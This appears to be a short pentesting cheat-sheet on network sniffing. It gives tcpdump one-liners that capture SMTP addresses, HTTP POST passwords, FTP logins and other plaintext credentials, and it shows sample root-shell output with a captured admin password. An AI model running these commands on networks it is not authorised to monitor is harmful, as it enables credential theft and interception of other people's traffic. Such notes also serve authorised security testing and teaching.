Network Sniffing

HTTP (80) on network? Can try to sniff plaintext credentials with tcpdump.

Capture SMTP Email

tcpdump -nn -l port 25 | grep -i 'MAIL FROM\|RCPT TO'

Extract HTTP Passwords in POST Requests

tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"

Capture FTP Credentials and Commands

tcpdump -nn -v port ftp or ftp-data

Capture all plaintext passwords

root@WEB01:/# tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
07:44:57.364252 IP 172.16.1.23.http > 172.16.1.30.51445: Flags [P.], seq 1:26, ack 268, win 237, length 25: HTTP: HTTP/1.1 100 Continue
E..A1f@[email protected]..^$'..k.pP...Z...HTTP/1.1 100 Continue


07:44:57.394599 IP 172.16.1.30.51445 > 172.16.1.23.http: Flags [P.], seq 268:347, ack 26, win 2053, length 79: HTTP
[email protected]^$'.P...zT..username=admin&password=Password123

username=admin&password=Password123

Last updated 2 years ago